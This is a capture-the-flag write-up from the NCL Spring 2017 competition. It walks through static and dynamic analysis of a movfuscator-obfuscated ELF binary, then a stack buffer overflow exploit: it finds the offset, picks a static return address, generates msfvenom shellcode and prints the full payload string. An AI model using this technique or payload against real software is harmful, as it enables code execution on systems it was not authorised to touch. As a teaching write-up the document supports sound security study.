This is going to be more of a walkthrough of how I analyze an unknown ELF file. I am by no means an expert and appreciate any feedback. Enjoy!

Some background: the file was provided during the NCL Spring 2017 Postseason competition under the "Enumeration and Exploitation" category.

Static Analysis

First things first: let's run the file command on it to see exactly what type of file this is.

File Information

From this we've learned two things:

It's a 32-bit ELF executable in LSB (least significant byte first, i.e. little-endian) form.
It's not stripped, meaning it still contains its symbol table.
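
Both the word size and the byte order come from the first few bytes of the file. Here is a minimal Python sketch of decoding them, assuming only the standard ELF identification layout. The function name describe_ident and the hand-built sample bytes are made up for illustration; this is not how the file command itself is implemented.

```python
ELF_MAGIC = b"\x7fELF"
EI_CLASS = {1: "32-bit", 2: "64-bit"}                     # byte 4 of e_ident
EI_DATA = {1: "LSB (little-endian)", 2: "MSB (big-endian)"}  # byte 5 of e_ident


def describe_ident(ident: bytes) -> str:
    """Decode the class and byte order from the start of an ELF file."""
    if len(ident) < 6 or ident[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    bits = EI_CLASS.get(ident[4], "unknown class")
    order = EI_DATA.get(ident[5], "unknown byte order")
    return f"ELF {bits} {order}"


# Hand-built identification bytes for a 32-bit little-endian ELF
# (illustrative only, not read from the challenge binary).
sample = ELF_MAGIC + bytes([1, 1, 1]) + bytes(9)
print(describe_ident(sample))
```

To try it on a real file, pass the first 16 bytes read in binary mode.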

ELF Header

A few new interesting points from this.

The entry point is at 0x80483dc (0x080483dc).
The program headers start at byte offset 52, and each entry is 32 bytes in size.
The section headers start at byte offset 10279512, and each entry is 40 bytes in size.
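
These fields all sit in the fixed 52-byte ELF32 header, which is why the program headers can start right at offset 52. Below is a rough sketch of pulling them out with Python's struct module, assuming a little-endian 32-bit file. The name parse_elf32_header is hypothetical, and the sample header is rebuilt by hand from the values above, with placeholder zeros for the fields the text does not mention.

```python
import struct

# ELF32 header layout: e_ident[16], e_type, e_machine, e_version, e_entry,
# e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum,
# e_shentsize, e_shnum, e_shstrndx (52 bytes in total).
ELF32_HEADER = struct.Struct("<16sHHIIIIIHHHHHH")


def parse_elf32_header(data: bytes) -> dict:
    """Return the header fields discussed in the text."""
    fields = ELF32_HEADER.unpack_from(data)
    return {
        "entry": fields[4],
        "phoff": fields[5],
        "shoff": fields[6],
        "phentsize": fields[9],
        "phnum": fields[10],
        "shentsize": fields[11],
        "shnum": fields[12],
    }


# Sample header rebuilt from the values quoted above. e_flags, e_shnum and
# e_shstrndx are placeholders (0) because the text does not give them.
ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
sample = ELF32_HEADER.pack(ident, 2, 3, 1, 0x080483DC, 52, 10279512,
                           0, 52, 32, 6, 40, 0, 0)
header = parse_elf32_header(sample)
print(hex(header["entry"]), header["phoff"], header["shoff"])
```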

Section Headers

So .text (1), .data (2), and .bss (3) should be loaded into memory at the following address ranges:

0x080483dc - 0x080592bb
0x0805b030 - 0x0860475c
0x08604760 - 0x08804770
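
With these ranges written down, it's easy to check which section any given address falls into. This is a small sketch that treats the ranges exactly as written and as inclusive, which is an assumption. The helper name section_for is made up for illustration.

```python
# Address ranges copied from the list above, treated as inclusive.
SECTIONS = {
    ".text": (0x080483DC, 0x080592BB),
    ".data": (0x0805B030, 0x0860475C),
    ".bss": (0x08604760, 0x08804770),
}


def section_for(address: int):
    """Return the name of the section containing address, or None."""
    for name, (start, end) in SECTIONS.items():
        if start <= address <= end:
            return name
    return None


# The entry point from the ELF header should land in .text.
print(section_for(0x080483DC))
```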

Also, the symbol table (.symtab) is 2,126,656 bytes, which is far from common; that's absolutely massive.

Program Headers

So this program contains six segments, two of which are LOAD (loadable) segments.
The first loadable segment (02) contains .text and has the read + execute (R E) flags.
The second (03) contains .data and .bss and has the read + write (RW) flags.
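
The flag letters are just a rendering of a small bitmask stored in each program header. Here is a quick sketch of that decoding, using the standard ELF values PF_X = 1, PF_W = 2 and PF_R = 4. The function name flags_to_str is hypothetical, and the three-column output only imitates how readelf prints the flags.

```python
# Standard ELF segment permission bits.
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def flags_to_str(p_flags: int) -> str:
    """Render p_flags as three columns: R, W, E (blank when unset)."""
    return (
        ("R" if p_flags & PF_R else " ")
        + ("W" if p_flags & PF_W else " ")
        + ("E" if p_flags & PF_X else " ")
    )


print(repr(flags_to_str(PF_R | PF_X)))  # the .text segment
print(repr(flags_to_str(PF_R | PF_W)))  # the .data/.bss segment
```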

Time to take a look at the symbol table and... it is indeed massive, with a large number of symbols in the format "alu_XX". It seems like this ELF is obfuscated in some way or another. We'll filter out all of the symbols containing "alu" for the time being to get a better look at the program's symbols.

Symbols Table

18: 00000000 0 FILE LOCAL DEFAULT ABS /root/tools/movfuscator/b

It seems the program was obfuscated with movfuscator, which is the reason for all of the "alu" symbols. Here are some other symbols that piqued my interest.

def_not_the_flag
discard
validate
main
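
The filtering step is nothing more than dropping every name that contains "alu", much like an inverted grep. A minimal sketch follows; the function name interesting_symbols is made up, and the alu_00/alu_01 entries in the sample are stand-ins that follow the "alu_XX" pattern rather than names taken from the binary.

```python
def interesting_symbols(names, noise="alu"):
    """Keep only the symbol names that do not contain the noise marker."""
    return [name for name in names if noise not in name]


# Hypothetical sample: the alu_* entries are placeholders, the rest are the
# symbols listed above.
sample = ["alu_00", "def_not_the_flag", "alu_01", "discard", "validate", "main"]
print(interesting_symbols(sample))
```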

We can now start looking at strings. However, since the binary is obfuscated, it's pretty obvious there's going to be a lot of noise. I couldn't even get all of the strings into a gist without it freezing on me, so I cut out most of the redundancies/noise.

Strings

A few interesting strings to note:

this doesn't seem right... try again
whooooo, you got it!
I guess, uh... type in a passcode:
usage: %s tid
SKY-ALTF-4810 (This is def_not_the_flag)
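
For anyone curious how this kind of extraction and noise reduction works, here is a rough Python approximation: find runs of printable ASCII, then drop repeats while keeping the first occurrence. It's a sketch, not a reimplementation of the strings utility. The function names and the sample bytes are made up for illustration.

```python
import re


def ascii_strings(data: bytes, min_len: int = 4):
    """Return every run of at least min_len printable ASCII characters."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


def unique_strings(data: bytes, min_len: int = 4):
    """Same as ascii_strings, but with duplicates removed in order."""
    return list(dict.fromkeys(ascii_strings(data, min_len)))


# Hand-made sample buffer (not bytes from the challenge binary).
sample = b"\x00\x01usage: %s tid\x00\xff\xfeab\x00SKY-ALTF-4810\x00usage: %s tid\x00"
print(unique_strings(sample))
```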

Without even running the program we know that you need to run it with your TID (team identifier) as a parameter. The program will then ask for input and print back whether it's correct or not. The flag never gets called or anything, but it's still kinda neat.

I'm going to use radare2 as my disassembler to disassemble the main function of the program.

Disassembling Main

We don't get much useful information from this, as the program is obfuscated with movfuscator. Movfuscator replaces all instructions with MOV; you can read more about it here. To get more meaningful information we need to move on to dynamic analysis.

Dynamic Analysis

I want to verify that the memory locations are the same as what I observed in the static analysis. Let's force the program to run in the background with ./NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8 & and then read the memory mapping of the program's PID with cat /proc/*PID*/maps.

Memory Mapping

We can see that we have 4 memory regions for this program.

08048000-0805a000 r-xp 00000000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
0805a000-0805b000 r-xp 00011000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
0805b000-08605000 rwxp 00012000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
08605000-08805000 rwxp 00000000 00:00 0

(1) is .text and its associated executable parts.
(2) holds the .dynamic/.got.plt sections, which are used by the ld-linux.so.2 dynamic linker.
(3) is .data.
(4) is .bss.
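
If you'd rather compare these regions against the static analysis programmatically, each line of the maps file splits cleanly into fields. Here is a small sketch, assuming the usual /proc/PID/maps column order (range, permissions, offset, device, inode, path). The function name parse_maps_line is made up. Note that the path here contains spaces, so the split is limited to five cuts.

```python
def parse_maps_line(line: str) -> dict:
    """Parse one line of /proc/PID/maps into its main fields."""
    # The pathname may contain spaces, so split at most five times.
    parts = line.split(None, 5)
    start, end = (int(value, 16) for value in parts[0].split("-"))
    return {
        "start": start,
        "end": end,
        "size": end - start,
        "perms": parts[1],
        "offset": int(parts[2], 16),
        "path": parts[5].strip() if len(parts) > 5 else "",
    }


# The anonymous fourth region from the listing above.
region = parse_maps_line("08605000-08805000 rwxp 00000000 00:00 0")
print(hex(region["start"]), hex(region["size"]), region["perms"])
```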

We're finally prepared to actually see what this program is doing. The easiest way to do this is strace, which traces the system calls and signals of a running program.

Strace

Well, as expected, it prints "I guess, uh... type in a passcode: " and then asks for user input. The program then gets stuck in some form of countdown loop, raising SIGILL (illegal instruction) signals at 0x80592b9 followed by SIGSEGV (segmentation fault) signals. It repeats this loop once per character of the TID, so a TID of length 20 means 20 loops. The output here is cut down for readability.

Fuzzing and Exploitation

We can get right to testing this program by sending 2000 A's to STDIN and monitoring what happens with strace.

Testing Input

...and it's stuck looping forever with a segmentation fault at 0x41414141, which is four A's. Let's verify this further in GDB.

Before jumping into GDB, I wholeheartedly recommend you install PEDA (Python Exploit Development Assistance) for GDB, as it makes life in GDB ten times easier.

Alright, so let's push 2000 A's into a file called inp and then have gdb feed that file's contents to the program whenever it reads from STDIN. We will also tell gdb to pass SIGSEGV signals through to the program with handle SIGSEGV pass, so it can continue whenever it hits one.
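
Creating the input file takes a couple of lines in any language. Here is a sketch in Python, where write_input is a hypothetical helper and the defaults mirror the 2000 A's used here.

```python
def write_input(path, count=2000, fill=b"A"):
    """Write count copies of fill to path and return the bytes written."""
    with open(path, "wb") as handle:
        return handle.write(fill * count)
```

Calling write_input("inp") produces the file. Inside gdb, the usual way to feed it to the program is shell-style redirection on the run command (something like run TID < inp), though the exact invocation used here is an assumption.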

Verifying in GDB

On the SIGSEGV we can see that our stack is loaded with our input of A's at 0x086041c8. We can also verify this by searching memory for a string of A's with find AAAAAAAAAAAAAAA, which returns the address 0x86041c8. So our input is being stored in the .data section, whose address is static, making jumping to our shellcode super simple.

Before we create our return address we first need to find the offset needed for the overflow. The easiest way to do this is with PEDA's pattern_create feature. Let's create a pattern of 2000 bytes and store it into our inp file with pattern_create 2000 inp.

Finding offset with PEDA

The segmentation fault is now at 0x416b6e41. Plugging that into PEDA's pattern_offset feature gives an offset of 1132 bytes before the overflow, which is where we can place our return address.
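
The idea behind pattern_create and pattern_offset is that every 4-byte window of the pattern is unique, so the crashing address tells you exactly how far into the input it came from. The sketch below illustrates the principle with the simpler Metasploit-style "Aa0Aa1Aa2..." pattern. This is not PEDA's pattern, so a value like 0x416b6e41 will not map to the same offset here. Both function names are made up for illustration.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def cyclic_pattern(length: int) -> bytes:
    """Build an 'Aa0Aa1Aa2...' pattern whose 4-byte windows are unique."""
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the unique pattern size")


def pattern_offset(value: int, length: int) -> int:
    """Find where a crashing 32-bit little-endian value sits in the pattern."""
    needle = struct.pack("<I", value)
    return cyclic_pattern(length).find(needle)


# Simulate a crash: pretend the 4 bytes at offset 1132 ended up in EIP.
pattern = cyclic_pattern(2000)
crash_value = struct.unpack("<I", pattern[1132:1136])[0]
print(pattern_offset(crash_value, 2000))
```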

Now all we need is a return address, which we can find with a mock exploit program that shows where our values are statically stored.

Mock Exploit

So when the program crashes with an address of BBBB (0x42424242) we can use PEDA's find feature to locate our mock shellcode of C's.

Testing our Mock Exploit

Our C's start at 0x8604638 (near the end of the .data section), which isn't going to change, allowing us to use this address as our return address and jump directly to our shellcode without any guessing. Once we reformat this address as little-endian and cut it into bytes, our return address is going to be \x38\x46\x60\x08.
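
As a sanity check, the address lines up with the earlier numbers: the input starts at 0x086041c8, the return address sits 1132 bytes in, and whatever follows those 4 bytes is where the shellcode lands. A short sketch of that arithmetic and of the little-endian conversion follows; the variable names are mine.

```python
import struct

INPUT_BASE = 0x086041C8  # where the A's were found in memory
OFFSET = 1132            # bytes of padding before the return address

# Skip the padding and the 4-byte return address itself.
shellcode_addr = INPUT_BASE + OFFSET + 4

# "<I" packs an unsigned 32-bit integer in little-endian byte order.
ret_bytes = struct.pack("<I", shellcode_addr)
print(hex(shellcode_addr), ret_bytes.hex())
```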

The entire point of this NCL challenge is to input the correct passcode to get the output of "whooooo, you got it!", so why don't we go ahead and cheat our way to that response? I'm extremely lazy, so let's just generate some shellcode with msfvenom to execute the command "echo whooooo, you got it!".

I had to block the characters \x00 (for obvious reasons), \xcb, \x0c, and \x0d, as those characters will split the output into multiple lines. Our program won't read input across multiple lines, so if the payload is split it'll only run a portion of the shellcode before hitting that split, causing a segmentation fault (due to only partial execution of the shellcode).
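
It's worth double-checking generated shellcode against the blocked characters before using it. Here is a minimal sketch of such a check, using the byte values listed above. The function name find_bad_bytes and the sample payloads are made up for illustration.

```python
# The blocked byte values exactly as listed in the text.
BAD_BYTES = bytes([0x00, 0xCB, 0x0C, 0x0D])


def find_bad_bytes(payload: bytes, bad: bytes = BAD_BYTES):
    """Return (offset, byte value) pairs for every blocked byte found."""
    return [(index, value) for index, value in enumerate(payload) if value in bad]


# Hypothetical payloads, not the msfvenom output.
print(find_bad_bytes(b"\x90\x90\x31\xc0"))
print(find_bad_bytes(b"\x90\x00\x31\x0d"))
```

An empty list means the payload is clean with respect to that set.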

Generating Our Shellcode

Now all we've got to do is put all the pieces together.
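
Conceptually the payload is just four pieces glued together: padding up to the offset, the return address, a short NOP sled, and the shellcode. Below is a minimal sketch of that layout, assuming the 1132-byte offset and the 0x08604638 address found earlier. The function name build_payload, the sled length of 20, and the placeholder shellcode bytes are illustrative assumptions, not the actual exploit script.

```python
import struct


def build_payload(offset, ret_addr, shellcode, nop_count=20):
    """Lay out padding + return address + NOP sled + shellcode."""
    padding = b"A" * offset              # filler up to the return address
    ret = struct.pack("<I", ret_addr)    # little-endian 32-bit address
    sled = b"\x90" * nop_count           # NOPs in front of the shellcode
    return padding + ret + sled + shellcode


# Placeholder bytes (int3 breakpoints) standing in for real shellcode.
placeholder = b"\xcc" * 8
payload = build_payload(1132, 0x08604638, placeholder)
print(len(payload), payload[1132:1136].hex())
```

Because the return address points at the first byte after itself, execution slides through the NOPs straight into whatever shellcode follows.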

Writing Our Exploit

Now let's run our exploit to get our "well deserved" message.

"Winning"

So NCL, my question is, do you accept an answer of.. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x38\x46\x60\x08\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xb8\xcf\x9b\x5e\x2b\xda\xc9\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1\x10\x31\x43\x13\x83\xeb\xfc\x03\x43\xc0\x79\xab\x41\xd5\x25\xcd\xc4\x8f\xbd\xc0\x8b\xc6\xd9\x73\x63\xab\x4d\x84\x13\x64\xec\xed\x8d\xf3\x13\xbf\xb9\x19\xd4\x40\x3a\x78\xb7\x28\x55\xa2\x40\xc1\xc6\xcd\xc1\x7e\x76\x3d\x3e\xf8\xe7\x48\x1e\x9d\x98\xc6\x7e\x08\x13\x07\x7f\x9d\x88\xce\x9e\xec\xaf?

No? Oh well, it was fun anyway!

Security and Stuff

Tuesday, July 4, 2017

Can't Figure Out The Answer To A CTF Challenge? Just Exploit It!